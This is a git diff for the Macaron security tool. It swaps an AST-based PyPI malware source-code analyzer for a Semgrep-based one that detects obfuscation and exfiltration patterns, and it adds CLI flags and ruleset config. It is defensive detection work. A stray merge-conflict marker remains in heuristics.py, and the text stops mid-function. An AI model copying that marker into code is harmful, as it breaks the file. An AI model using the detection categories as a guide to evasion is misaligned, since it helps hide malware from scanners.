+SAMPLES_PATH="${MACARON_DIR}/tests/malware_analyzer/pypi/resources/sourcecode_samples" + +# any files have any of the executable bits set +executables=$( ( find "$SAMPLES_PATH" -type f -perm -u+x -o -type f -perm -g+x -o -type f -perm -o+x | sed "s|$MACARON_DIR/||"; git ls-files "$SAMPLES_PATH" --full-name) | sort | uniq -d) +if [ -n "$executables" ]; then + echo "The following files should not have any executable permissions:" + echo "$executables" + exit 1 +fi diff --git a/src/macaron/__main__.py b/src/macaron/__main__.py index 03549db7f..7e380d989 100644 --- a/src/macaron/__main__.py +++ b/src/macaron/__main__.py @@ -96,6 +96,10 @@ def analyze_slsa_levels_single(analyzer_single_args: argparse.Namespace) -> None global_config.local_maven_repo = user_provided_local_maven_repo + if analyzer_single_args.force_analyze_source and not analyzer_single_args.analyze_source: + logger.error("'--force-analyze-source' requires '--analyze-source'.") + sys.exit(os.EX_USAGE) + analyzer = Analyzer(global_config.output_path, global_config.build_log_path) # Initiate reporters. @@ -172,8 +176,9 @@ def analyze_slsa_levels_single(analyzer_single_args: argparse.Namespace) -> None analyzer_single_args.sbom_path, deps_depth, provenance_payload=prov_payload, - validate_malware=analyzer_single_args.validate_malware, verify_provenance=analyzer_single_args.verify_provenance, + analyze_source=analyzer_single_args.analyze_source, + force_analyze_source=analyzer_single_args.force_analyze_source, ) sys.exit(status_code) @@ -477,10 +482,22 @@ def main(argv: list[str] | None = None) -> None: ) single_analyze_parser.add_argument( - "--validate-malware", + "--analyze-source", required=False, action="store_true", - help=("Enable malware validation."), + help=( + "For improved malware detection, analyze the source code of the" + + " (PyPI) package using a textual scan and dataflow analysis." + ), + ) + + single_analyze_parser.add_argument( + "--force-analyze-source", + required=False, + action="store_true", + help=( + "Forces PyPI sourcecode analysis to run regardless of other heuristic results. Requires '--analyze-source'." + ), ) single_analyze_parser.add_argument( diff --git a/src/macaron/config/defaults.ini b/src/macaron/config/defaults.ini index 5e5f6d9a3..8bda9e942 100644 --- a/src/macaron/config/defaults.ini +++ b/src/macaron/config/defaults.ini @@ -615,4 +615,27 @@ scaling = 0.15 cost = 1.0 # The path to the file that contains the list of popular packages. popular_packages_path = ->>>>>>> 1c65d5f (feat(security): add package name typosquatting detection (#1059)) + +# ==== The following sections are for source code analysis using Semgrep ==== +# rulesets: a reference to a 'ruleset' in this section refers to a Semgrep .yaml file containing one or more rules. +# rules: a reference to a 'rule' in this section refers to an individual rule ID, specified by the '- id:' field in +# the Segmrep .yaml file. +# default rulesets: these are a collection of rulesets provided with Macaron which are run by default with the sourcecode +# analyzer. These live in src/macaron/resources/pypi_malware_rules. +# custom rulesets: this is a collection of user-provided rulesets, living inside the path provided to 'custom_semgrep_rules_path'. + +# disable default semgrep rulesets here (i.e. all rule IDs in a Semgrep .yaml file) using ruleset names, the name +# without the .yaml prefix. Currently, we disable the exfiltration rulesets by default due to a high false positive rate. +# This list may not contain duplicated elements. Macaron's default ruleset names are all unique. +disabled_default_rulesets = exfiltration +# disable individual rules here (i.e. individual rule IDs inside a Semgrep .yaml file) using rule IDs. You may also +# provide the IDs of your custom semgrep rules here too, as all Semgrep rule IDs must be unique. This list may not contain +# duplicated elements. +disabled_rules = +# absolute path to a directory where a custom set of semgrep rules for source code analysis are stored. These will be included +# with Macaron's default rules. The path will be normalised to the OS path type. +custom_semgrep_rules_path = +# disable custom semgrep rulesets here (i.e. all rule IDs in a Semgrep .yaml file) using ruleset names, the name without the +# .yaml prefix. Note, this will be ignored if a path to custom semgrep rules is not provided. This list may not contain +# duplicated elements, meaning that ruleset names must be unique. +disabled_custom_rulesets = diff --git a/src/macaron/errors.py b/src/macaron/errors.py index 34ab1da89..d5983a0bc 100644 --- a/src/macaron/errors.py +++ b/src/macaron/errors.py @@ -109,3 +109,7 @@ class HeuristicAnalyzerValueError(MacaronError): class LocalArtifactFinderError(MacaronError): """Happens when there is an error looking for local artifacts.""" + + +class SourceCodeError(MacaronError): + """Error for operations on package source code.""" diff --git a/src/macaron/malware_analyzer/README.md b/src/macaron/malware_analyzer/README.md index af8451279..4e63e1818 100644 --- a/src/macaron/malware_analyzer/README.md +++ b/src/macaron/malware_analyzer/README.md @@ -1,4 +1,4 @@ -# Implementation of Heuristic Malware Detector +# Implementation of Malware Detector ## PyPI Ecosystem @@ -56,6 +56,20 @@ When a heuristic fails, with `HeuristicResult.FAIL`, then that is an indicator b - **Description**: Checks if the package name is suspiciously similar to any package name in a predefined list of popular packages. The similarity check incorporates the Jaro-Winkler distance and considers keyboard layout proximity to identify potential typosquatting. - **Rule**: Return `HeuristicResult.FAIL` if the similarity ratio between the package name and any popular package name meets or exceeds a defined threshold; otherwise, return `HeuristicResult.PASS`. - **Dependency**: None. +### Source Code Analysis with Semgrep + +The following analyzer has been included as an optional feature, available by supplying `--analyze-source` in the CLI to `macaron analyze`: + +**PyPI Source Code Analyzer** +- **Description**: Uses Semgrep, with default rules written in `src/macaron/resources/pypi_malware_rules` and custom rules available by supplying a path to `custom_semgrep_rules` in `defaults.ini`, to scan the package `.tar` source code. +- **Rule**: If any Semgrep rule is triggered, the heuristic fails with `HeuristicResult.FAIL` and subsequently fails the package with `CheckResultType.FAILED`. If no rule is triggered, the heuristic passes with `HeuristicResult.PASS` and the `CheckResultType` result from the combination of all other heuristics is maintained. +- **Dependency**: Will be run if the Source Code Repo fails. This dependency can be bypassed by suppying `--force-analyze-source` in the CLI, along with `--analyze-source`. + +This feature is currently a work in progress, and supports detection of code obfuscation techniques and remote exfiltration behaviors. It uses Semgrep OSS for detection. `defaults.ini` may be used to provide custom rules and exclude them: +- `disabled_default_rulesets`: supply to this a comma separated list of the names of default Semgrep rule files (excluding the `.yaml` extension) to disable all rule IDs in that file. +- `disabled_rules`: supply to this a comma separated list of individual rule IDs to disable (from both the default and custom list). +- `custom_semgrep_rules`: supply to this an absolute path to a directory containing custom Semgrep `.yaml` files to be run alongside the default ones. +- `disabled_custom_rulesets`: supply to this a comma separated list of the names of custom Semgrep rule files (excluding the `.yaml` extension) to disable all rule IDs in that file. ### Contributing @@ -64,6 +78,7 @@ When contributing an analyzer, it must meet the following requirements: - The analyzer must be implemented in a separate file, placed in the relevant folder based on what it analyzes ([metadata](./pypi_heuristics/metadata/) or [sourcecode](./pypi_heuristics/sourcecode/)). - The analyzer must inherit from the `BaseHeuristicAnalyzer` class and implement the `analyze` function, returning relevant information specific to the analysis. - The analyzer name must be added to [heuristics.py](./pypi_heuristics/heuristics.py) file so it can be used for rule combinations in [detect_malicious_metadata_check.py](../slsa_analyzer/checks/detect_malicious_metadata_check.py) +- The analyzer must be added to the list of analyzers in `detect_malicious_metadata_check.py` to be run. - Update the `malware_rules_problog_model` in [detect_malicious_metadata_check.py](../slsa_analyzer/checks/detect_malicious_metadata_check.py) with logical statements where the heuristic should be included. When adding new rules, please follow the following guidelines: - Provide a [confidence value](../slsa_analyzer/checks/check_result.py) using the `Confidence` enum. - Ensure it is assigned to the `problog_result_access` string variable, otherwise it will not be queried and evaluated. @@ -71,6 +86,39 @@ When contributing an analyzer, it must meet the following requirements: - Make sure to wrap pass/fail statements in `passed()` and `failed()`. Not doing so may result in undesirable behaviour, see the comments in the model for more details. - If there are commonly used combinations introduced by adding the heuristic, combine and justify them at the top of the static model (see `quickUndetailed` and `forceSetup` as current examples). +**Contributing Code Pattern Rules** + +When contributing more Semgrep rules for `pypi_sourcecode_analyzer.py` to use, the following requirements must be met: + +- Semgrep `.yaml` Rules are stored in `src/macaron/resources/pypi_malware_rules` and are named based on the category of code behaviors they detect. +- If the rule comes under one of the already defined categories, place it within that `.yaml` file, else create a new `.yaml` file using the category name. +- Each rule ID must be prefixed by the category followed by a single underscore ('_'), so for obfuscation rules in `obfuscation.yaml` each rule ID is prefixed with `obfuscation_`, followed by an ID which uses a hiphen ('-') as a separator. +- Tests must be written for each rule contributed. These are stored in `tests/malware_analyzer/pypi/test_pypi_sourcescode_analyzer.py`. +- These tests are written on a per-category bases, running each category individually. Each category must have a folder under `tests/malware_analyzer/pypi/resources/sourcecode_samples`. +- Within these folders, there must be sample code patterns for testing, and a file `expected_results.json` with the expected JSON output of the analyzer for that category. +- Each sample code pattern `.py` file must not have executable permissions and must include code that prevents it from being accidentally imported or run. The current files use this method: + +``` +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() +``` + ### Confidence Score Motivation The original seven heuristics which started this work were Empty Project Link, Unreachable Project Links, One Release, High Release Frequency, Unchange Release, Closer Release Join Date, and Suspicious Setup. These heuristics (excluding those with a dependency) were run on 1167 packages from trusted organizations, with the following results: diff --git a/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py b/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py index b9f743a55..c46904fca 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py @@ -45,6 +45,9 @@ class Heuristics(str, Enum): TYPOSQUATTING_PRESENCE = "typosquatting_presence" >>>>>>> 1c65d5f (feat(security): add package name typosquatting detection (#1059)) + #: Indicates that the package source code contains suspicious code patterns. + SUSPICIOUS_PATTERNS = "suspicious_patterns" + class HeuristicResult(str, Enum): """Result type indicating the outcome of a heuristic.""" diff --git a/src/macaron/malware_analyzer/pypi_heuristics/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/pypi_sourcecode_analyzer.py deleted file mode 100644 index edf7a1830..000000000 --- a/src/macaron/malware_analyzer/pypi_heuristics/pypi_sourcecode_analyzer.py +++ /dev/null @@ -1,491 +0,0 @@ -# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved. -# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. - -""" -Detect suspicious function calls in the code and trace the arguments back to their original values. - -This allows for deeper analysis of potentially malicious behavior. -""" - -import ast -import base64 -import binascii -import ipaddress -import logging -import os -import pathlib -import re - -import yaml - -from macaron.json_tools import JsonType -from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset - -logger: logging.Logger = logging.getLogger(__name__) - - -class DataFlowTracer(ast.NodeVisitor): - """The class is used to create the symbol table and analyze the dataflow.""" - - def __init__(self) -> None: - self.symbol_table: dict = {} # Store variable assignments - self.trace_path: list = [] - - def visit_Assign(self, node: ast.Assign) -> None: # noqa: N802 # pylint: disable=C0103 - """Visit the Assign node and build the symbol table.""" - for target in node.targets: - if isinstance(target, ast.Name): - target_name = target.id - if isinstance(node.value, ast.Name): - self.symbol_table[target_name] = str(node.value.id) - elif isinstance(node.value, ast.Constant): - self.symbol_table[target_name] = str(node.value.value) - # Handle other assignment types as needed (e.g., function calls, lists) - else: - self.symbol_table[target_name] = ast.unparse(node.value) - self.generic_visit(node) # Important for visiting nested assign - - def trace_back(self, variable_name: str) -> list: - """Get the full path of the dataflow. - - Parameters - ---------- - variable_name: str - The argument of the function call. - - Returns - ------- - list - The path of the dataflow. - """ - self.trace_path = [] - self._recursive_trace(variable_name) - return self.trace_path - - def _recursive_trace(self, variable_name: str) -> None: - """Recursively build the dataflow path by analyzing the symbol table. - - Parameters - ---------- - variable_name: str - The argument of the function call. - """ - if variable_name in self.symbol_table: - value = self.symbol_table[variable_name] - if not self.trace_path: - self.trace_path.extend([variable_name, value]) - else: - self.trace_path.append(value) - if ( - isinstance(value, str) and value in self.symbol_table and self.symbol_table[value] != value - ): # only trace if it is a var name - self._recursive_trace(value) - - def generate_symbol_table(self, source_code: str) -> None: - """Generate the symbol table. - - Parameters - ---------- - source_code: str - The source code of the script. - """ - tree = ast.parse(source_code) - self.visit(tree) - - -class PyPISourcecodeAnalyzer: - """This class is used to analyze the source code.""" - - def __init__(self, pypi_package_json: PyPIPackageJsonAsset) -> None: - """Collect required data for analysing the source code.""" - self.source_code: dict[str, str] | None = pypi_package_json.get_sourcecode() - self.suspicious_pattern: dict[str, JsonType] | None = self._load_suspicious_pattern() - # self.extracted_suspicious_content: dict[str, JsonType] = {} - self.analysis_result: dict = {} - self.is_malware: bool = False - - def analyze(self) -> tuple[bool, dict]: - """Analyze the source code of the PyPI package. - - Returns - ------- - dict - The result of the analysis. - """ - if self.source_code and self.suspicious_pattern: - for filename, content in self.source_code.items(): - try: - imports = self._extract_imports_from_ast(content) - except SyntaxError: - imports = self._extract_imports_from_lines(content) - - if isinstance(self.suspicious_pattern["imports"], list): - suspicious_imports: set[str] | None = imports & set(self.suspicious_pattern["imports"]) - else: - suspicious_imports = None - - # No suspicious imports in the source code. Skip the further steps. - if not suspicious_imports: - logger.debug("No suspicious imports found in the file %s", filename) - continue - - # TODO: Currently the symbol table stores the data for dataflow analysis. - # In the future, the dataflow will be more complicated and even handle the cross-file dataflow. - tracer = DataFlowTracer() - tracer.generate_symbol_table(content) - logger.debug(tracer.symbol_table) - - # TODO: In the future, the probability policy to decide the file is malicious or not - # will be implemented. Therefore, the functioncall_analyzer.analyze() will return detail_info - # and analysis result. - functioncall_analyzer = FunctionCallAnalyzer(self.suspicious_pattern, tracer) - is_malware, detail_info = functioncall_analyzer.analyze(content) - if is_malware: - self.is_malware = is_malware - - # TODO: Currently, the result collector does not handle the situation that - # multiple same filename. In the future, this will be replace with absolute path. - if detail_info: - self.analysis_result[filename] = detail_info - - # TODO: Implement other suspicious setup in suspicious_pattern.yaml - # pattern = r"install_requires\s*=\s*\[(.*?)\]" - # matches: re.Match | None = re.search(pattern, content, re.DOTALL) - # if matches: - # install_requires: set[str] | None = set(re.findall(r"'(.*?)'", matches.group(1))) - # if ( - # install_requires - # and install_requires & set(self.suspicious_pattern["imports"]) - # and len(install_requires) < 4 - # # This threshold is based on historical malwares - # ): - # extracted_data["install_requires"] = install_requires - # TODO: In the future this result from each file will be used to calculate the probability. - # Then the is_malicious will be based on this value. - # Currently, the default policy is - return self.is_malware, self.analysis_result - - # def extract_susupicious_content(self) -> None: - # """Extract the suspicious content from the source code.""" - # if not self.source_code or not self.suspicious_pattern: - # return - # self.extracted_suspicious_content = self._extract_suspicious_content_from_source() - - def _load_suspicious_pattern(self) -> dict[str, JsonType] | None: - """Load the suspicious pattern from suspicious_pattern.yaml. - - Returns - ------- - dict[str, JsonType] | None - The suspicious pattern. - """ - filename: str = "suspicious_pattern.yaml" - curr_dir: pathlib.Path = pathlib.Path(__file__).parent.absolute() - suspicious_pattern_file: str = os.path.join(curr_dir, filename) - with open(suspicious_pattern_file, encoding="utf-8") as file: - try: - suspicious_pattern: dict[str, JsonType] = yaml.safe_load(file) - except yaml.YAMLError as yaml_exception: - logger.debug("Error parsing the yaml file: '%s'", yaml_exception) - return None - return suspicious_pattern - - def _extract_imports_from_ast(self, content: str) -> set[str]: - """Extract imports from source code using the parsed AST. - - Parameters - ---------- - source_content: str - The source code as a string. - - Returns - ------- - set[str] - The set of imports. - - Raises - ------ - SyntaxError - If the code could not be parsed. - """ - imports = set() - tree = ast.parse(content) - for node in ast.walk(tree): - if isinstance(node, ast.Import): - for alias in node.names: - imports.add(alias.name) - elif isinstance(node, ast.ImportFrom): - module = node.module - if module: - _module = "." * node.level + module - imports.add(_module) - for name in node.names: - imports.add(_module + "." + name.name) - - return imports - - def _extract_imports_from_lines(self, content: str) -> set[str]: - """Extract imports from source code using per line pattern matching. - - Parameters - ---------- - source_content: str - The source code as a string. - - Returns - ------- - set[str] - The list of imports. - """ - alias_pattern = r"\s+as\s+\w+(?:\.{0,1}\w+)*" - # Pattern for module aliases. - - module_name = r"\w+(?:\.{0,1}\w+" - # as described under pattern_import. - - pattern_import = ( - r"(?:import\s+)(" + module_name + r")*(?:" + alias_pattern + r")?" - r"(?:(?:\s*,\s*)(?:" + module_name + r")*(?:" + alias_pattern + r")?))*)(?:(?:\s|#).*)?" - ) - # Allows for a standard import statement. - # E.g.: import - # Where consists of one or more . - # Where consists of one or more words (a-z or 0-9 or underscore) separated by periods, - # with an optional alias. - # Where allows any character(s) either after a single space or a hash (#). - - pattern_from_import = ( - r"(?:from\s+)([.]*" - + module_name - + r")*)(?:\s+import\s+(\w+(?:\s+as\s+\w+)?(?:(?:\s*,\s*)(?:\w+(?:\s+as\s+\w+)?))*))" - ) - # Allows for a from import statement. - # E.g.: from import - # Where is as above, but can also be preceded by any number of periods. - # (Note only a single module can be placed here.) - # Where consists of one or more with optional aliases. - # Where is identical to except without any periods. - # Where requires at least one space followed by one or more word characters, plus - # any other characters following on from that. - - combined_pattern = f"^(?:{pattern_import})|(?:{pattern_from_import})$" - # The combined pattern creates two match groups: - # 1 - standard import statement. - # 2 - from import statement module. - # 3 - from import statement module components. - - imports = set() - for line in content.splitlines(): - line.strip() - match = re.match(combined_pattern, line) - if not match: - continue - - if match.group(1): - # Standard import, handle commas and aliases if present. - splits = self._prune_aliased_lines(match.group(1), alias_pattern) - for split in splits: - imports.add(split) - elif match.group(2): - # From import - imports.add(match.group(2)) - if match.group(3): - splits = self._prune_aliased_lines(match.group(3), alias_pattern) - for split in splits: - imports.add(match.group(2) + "." + split) - - return imports - - def _prune_aliased_lines(self, text: str, alias_pattern: str) -> list[str]: - """Split the line on commas and remove any aliases from individual parts.""" - results = [] - splits = text.split(",") - for split in splits: - split = split.strip() - results.append(re.sub(alias_pattern, "", split)) - return results - - -class FunctionCallAnalyzer(ast.NodeVisitor): - """This class analyzes Python source code to identify potential suspicious behavior.""" - - def __init__(self, suspicious_pattern: dict, tracer: DataFlowTracer) -> None: - """Initialize the analyzer. - - Parameters - ---------- - suspicious_pattern: dict - The suspicious behaviour mainly includes the function call and constant. - """ - self.suspicious_patterns: dict = suspicious_pattern - self.analysis_detail: dict = { - "OS Detection": {}, - "Code Execution": {}, - "Information Collecting": {}, - "Remote Connection": {}, - "Custom Setup": {}, - "Obfuscation": {}, - } - self.tracer = tracer - self.is_malware = False - - def visit_Module(self, node: ast.Module) -> None: # noqa: N802 # pylint: disable=C0103 - """Visit all root node.""" - self.generic_visit(node) - - # TODO: Detect OS might generate false alert. - # def visit_If(self, node: ast.If) -> None: - # """Visit the If node.""" - # if isinstance(node.test, ast.Compare): - # unparsed_expr: str = ast.unparse(node) - # # Some malware excute different malicious code based on the victims OS. - # for os_detection_constant in self.suspicious_patterns["ast_constant"]["os_detection"]: - # if os_detection_constant in unparsed_expr: - # TODO: This function is required to be implemented with dataflow analysis - # self.analysis_detail["OS Detection"][node.lineno] = unparsed_expr - # self.is_malware = True - # self.generic_visit(node) - - def visit_Call(self, node: ast.Call) -> None: # noqa: N802 # pylint: disable=C0103 - """Visit the Call node.""" - suspicious_calls: dict = self.suspicious_patterns["ast_calls"] - suspicious_const: dict = self.suspicious_patterns["ast_constant"] - function_call: str = ast.unparse(node.func) - args: str = " ".join([ast.unparse(arg) for arg in node.args]) - expr: str = ast.unparse(node) - trace_path: list = self.tracer.trace_back(args) - path: str = "" - if trace_path: - path = " ->".join(trace_path) - for call_type in suspicious_calls: - if self._is_malware(suspicious_calls[call_type], function_call): - for constant_type in suspicious_const: # Further confirmed by checking the arguments - if ( - self._is_malware(suspicious_const[constant_type], args) - or IP().extract_public_ipv4(args) - or self._is_malware(suspicious_const[constant_type], Decryptor().base64_decode(args)) - ): - self._summarize_analysis_detail(call_type, node.lineno, expr) - self.is_malware = True - elif self._is_malware(suspicious_const[constant_type], path): - self._summarize_analysis_detail(call_type, node.lineno, expr, path) - self.is_malware = True - self.generic_visit(node) - - def visit_ClassDef(self, node: ast.ClassDef) -> None: # noqa: N802 # pylint: disable=C0103 - """Visit the ClassDef node. This function is used to detect malicious behavior in setup.py.""" - if not node.bases: - self.generic_visit(node) - return - - for base in node.bases: - if isinstance(base, ast.Name): - if base.id == "install": - # TODO: Not pretty sure including this in setup.py means it is a malware, so the self.is_malware is not updated. - self.analysis_detail["Custom Setup"][node.lineno] = node.name - self.generic_visit(node) - - def _summarize_analysis_detail( - self, function_call_type: str, lineno: int, expr: str, trace_path: str | None = None - ) -> None: - """Store the analysis result in based on different type of malicious behaviour. - - Parameters - ---------- - function_call_type: str - The suspcious function call type. - lineno: int - The location of the source code block. - expr: str - The source code block. - trace_path: str - The dataflow path. - """ - detail = [expr] - - if trace_path: - detail.append(trace_path) - - match function_call_type: - case "code_execution": - self.analysis_detail["Code Execution"][lineno] = detail - case "info_collecting": - self.analysis_detail["Information Collecting"][lineno] = detail - case "remote_connection": - self.analysis_detail["Remote Connection"][lineno] = detail - case "obfuscation": - self.analysis_detail["Obfuscation"][lineno] = detail - - def _is_malware(self, malicious_pattern: list, target: str | None) -> bool: - """Check the source code matched the suspicious pattern. - - Parameters - ---------- - malicious_pattern: list - A collection of the suspicious source code. - target: str - The componenet of the source code block. - - Returns - ------- - bool - The result. - """ - if not target: - return False - for _ in malicious_pattern: # pylint: disable=C0103, C0501 - if _ in target: - return True - return False - - def analyze(self, source_code: str) -> tuple[bool, dict]: - """Analyze the source code.""" - tree = ast.parse(source_code) - self.visit(tree) - return self.is_malware, self.analysis_detail - - -class Decryptor: - """This class includes multiple built-in decryption methods.""" - - # Only decrypt the string with the built-in decrypt method; otherwise, provide the source code - # for the user. And notify them to decrypt using the corresponding decrypt method - # TODO: Implement more decryption method. - - def __init__(self) -> None: - pass - - def base64_decode(self, encoded_value: str | bytes) -> str | None: - """Decode the encoded value.""" - try: - decoded_bytes = base64.b64decode(encoded_value) - return decoded_bytes.decode("utf-8") - except (binascii.Error, UnicodeDecodeError): - return None - - -class IP: - """This class provides the method to identify the IP in the source code.""" - - def __init__(self) -> None: - pass - - def is_valid_public_ipv4(self, ip: str) -> bool: - """Check whether it is a public IPv4.""" - try: - ip_obj = ipaddress.ip_address(ip) - return ip_obj.version == 4 and not ip_obj.is_private and not ip_obj.is_loopback - except ValueError: - # If ip_address() raises an error, it's not a valid IP - return False - - def extract_public_ipv4(self, text: str) -> list: - """Extract the public IPv4 from the source code.""" - ipv4_pattern = r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b" - all_ips = re.findall(ipv4_pattern, text) - # Filter valid public IPv4 addresses - valid_public_ipv4s = [] - for ip in all_ips: - if self.is_valid_public_ipv4(ip): - valid_public_ipv4s.append(ip) - return valid_public_ipv4s diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py new file mode 100644 index 000000000..c6805dece --- /dev/null +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -0,0 +1,330 @@ +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Detect suspicious function calls in the code and trace the arguments back to their original values. + +This allows for deeper analysis of potentially malicious behavior. +""" + +import glob +import json +import logging +import os +import subprocess # nosec +import tempfile + +import yaml + +from macaron.config.defaults import defaults +from macaron.config.global_config import global_config +from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError +from macaron.json_tools import JsonType, json_extract +from macaron.malware_analyzer.pypi_heuristics.base_analyzer import BaseHeuristicAnalyzer +from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult, Heuristics +from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset + +logger: logging.Logger = logging.getLogger(__name__) + + +class PyPISourcecodeAnalyzer(BaseHeuristicAnalyzer): + """This class is used to analyze the source code of python PyPI packages. This analyzer is a work in progress. + + Currently the analyzer performs textual pattern matching and dataflow analysis using the open-source features of + Semgrep. Semgrep open-source taint tracking can only perform in one locale, but this is a known limitation. Default + rules are stored in 'macaron/resources/pypi_malware_rules' as semgrep .yaml rule files. A user may add additional + rules stored in a specified directory passed by them in the 'defaults.ini' configuration file. + """ + + def __init__(self, resources_path: str | None = None) -> None: + """ + Initialise the source code analyzer and load default and custom semgrep rulesets. + + Parameters + ---------- + resources_path: str | None + The path to the resources directory which must contain a 'pypi_malware_rules' directory of + semgrep rules. If None is provided, then this is loaded from the global config resources path. + Defaults to None + + Raises + ------ + ConfigurationError + If the default rule path is invalid, the heuristic.pypi entry is not present, or if the semgrep + validation of the custom rule path failed. + """ + super().__init__( + name="suspicious_patterns_analyzer", + heuristic=Heuristics.SUSPICIOUS_PATTERNS, + # We include the SKIP condition here as we want to consider the case where EMPTY_PROJECT_LINK fails, + # meaning SOURCE_CODE_REPO is skipped, as this is still a scenario where the source code repository + # is not available, so we want to run source code analysis. + depends_on=[ + (Heuristics.SOURCE_CODE_REPO, HeuristicResult.FAIL), + (Heuristics.SOURCE_CODE_REPO, HeuristicResult.SKIP), + ], + ) + if resources_path is None: + resources_path = global_config.resources_path + self.default_rule_path, self.custom_rule_path, self.disabled_rule_ids = self._load_defaults(resources_path) + + def _load_defaults(self, resources_path: str) -> tuple[str, str | None, set[str]]: + """ + Load the default semgrep rules and, if present, the custom semgrep rules provided by the user. + + Semgrep validation is run on the custom rules provided by the user. + + Parameters + ---------- + resources_path: str + The path to the resources directory which must contain a 'pypi_malware_rules' directory of + semgrep rules. + + Returns + ------- + tuple[str, str | None] + The default rule path and the custom rule path or None if one was not provided + + Raises + ------ + ConfigurationError + If the default rule path is invalid, the heuristic.pypi entry is not present, or if the semgrep + validation of the custom rule path failed. + """ + default_rule_path = os.path.join(resources_path, "pypi_malware_rules") + if not os.path.exists(default_rule_path): + error_msg = f"Error with locating default rule path {default_rule_path}" + logger.debug(error_msg) + raise ConfigurationError(error_msg) + + section_name = "heuristic.pypi" + + if defaults.has_section(section_name): + section = defaults[section_name] + else: + error_msg = f"Unable to find section {section_name}, which must be present." + logger.debug(error_msg) + raise ConfigurationError(error_msg) + + configuration_name = "custom_semgrep_rules_path" + custom_rule_path = section.get(configuration_name) + if not custom_rule_path: # i.e. None or empty string + logger.debug("No custom path listed under %s, using default rules only.", configuration_name) + custom_rule_path = None + else: + custom_rule_path = os.path.normpath(custom_rule_path) + if not os.path.exists(custom_rule_path): + error_msg = f"Unable to locate path {custom_rule_path}" + logger.debug(error_msg) + raise ConfigurationError(error_msg) + + semgrep_commands: list[str] = ["semgrep", "scan", "--validate", "--oss-only", "--config", custom_rule_path] + try: + process = subprocess.run(semgrep_commands, check=True, capture_output=True) # nosec + except (subprocess.CalledProcessError, subprocess.TimeoutExpired) as semgrep_error: + error_msg = ( + f"Unable to run semgrep validation on {custom_rule_path} with arguments " + f"{semgrep_commands}: {semgrep_error}." + ) + logger.debug(error_msg) + raise ConfigurationError(error_msg) from semgrep_error + + if process.returncode != 0: + error_msg = f"Error running semgrep validation on {custom_rule_path} with arguments" f" {process.args}." + logger.debug(error_msg) + raise ConfigurationError(error_msg) + + logger.debug("Including custom ruleset from %s.", custom_rule_path) + + disabled_rule_ids = set() + + disabled_default_rulesets = defaults.get_list(section_name, "disabled_default_rulesets") + if disabled_default_rulesets: + target_files = {f"{name}.yaml" for name in disabled_default_rulesets} + disabled_rule_ids.update(self._extract_rule_ids(default_rule_path, target_files)) + + disabled_custom_rulesets = defaults.get_list(section_name, "disabled_custom_rulesets") + if disabled_custom_rulesets: + if custom_rule_path: + target_files = {f"{name}.yaml" for name in disabled_custom_rulesets} + disabled_rule_ids.update(self._extract_rule_ids(custom_rule_path, target_files)) + else: + logger.warning("Disabled custom rulesets provided without a set of custom rulesets. Ignoring.") + + disabled_rules = defaults.get_list(section_name, "disabled_rules") + if disabled_rules: + disabled_rule_ids.update(set(disabled_rules)) + + if disabled_rule_ids: + logger.debug("Disabling the following rules: %s.", disabled_rule_ids) + + return default_rule_path, custom_rule_path, disabled_rule_ids + + def _extract_rule_ids(self, path: str, target_files: set[str]) -> set[str]: + """ + Extract Semgrep rule IDs from a set of target .yaml Semgrep rules nested inside the provided path. + + Raise an error when not all target Semgrep rule files are found in the provided path or subdirectories + of the provided path. + + Parameters + ---------- + path: str + The path that includes the target Semgrep rules in it or subdirectories of it. + target_files: set[str] + A set of unique Semgrep rule file names (with their .yaml extension) to find in the provided path. + + Returns + ------- + set[str] + A set of unique Semgrep rule IDs extracted from all provided target files. + + Raises + ------ + ConfigurationError + If any Semgrep rule file could not be safely loaded, or if their format was not in the expected Semgrep + format, or if there were any files in 'target_files' not found when searching in 'path'. + """ + # We keep a record of any file paths we coulnd't find to provide a more useful error message, rather than raising + # an error on the first missing file we see. + missing_files: list[str] = [] + target_file_paths: list[str] = [] + rule_ids: set[str] = set() + + for target_file in target_files: + file_paths = glob.glob(os.path.join(path, "**", target_file), recursive=True) + if not file_paths: + missing_files.append(target_file) + target_file_paths.extend(file_paths) + + if missing_files: + error_msg = f"The following semgrep files were not found in {path}: {missing_files}" + logger.debug(error_msg) + raise ConfigurationError(error_msg) + + for file_path in target_file_paths: + try: + with open(file_path, encoding="utf-8") as file: + semgrep_ruleset: dict[str, list] = yaml.safe_load(file.read()) + except yaml.YAMLError as yaml_error: + error_msg = f"Unable to open semgrep rule file {file_path}: {yaml_error}." + logger.debug(error_msg) + raise ConfigurationError(error_msg) from yaml_error + + # should be a top-level key "rules", and then a list of rules (dictionaries) with "id" entries + try: + for semgrep_rule in semgrep_ruleset["rules"]: + rule_ids.add(semgrep_rule["id"]) + except (KeyError, TypeError) as format_error: + error_msg = f"Invalid semgrep rule format for {file_path}: {format_error}." + logger.debug(error_msg) + raise ConfigurationError(error_msg) from format_error + + return rule_ids + + def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: + """Analyze the source code of the package for malicious patterns. + + This is the first phase of the source code analyzer. + + Parameters + ---------- + 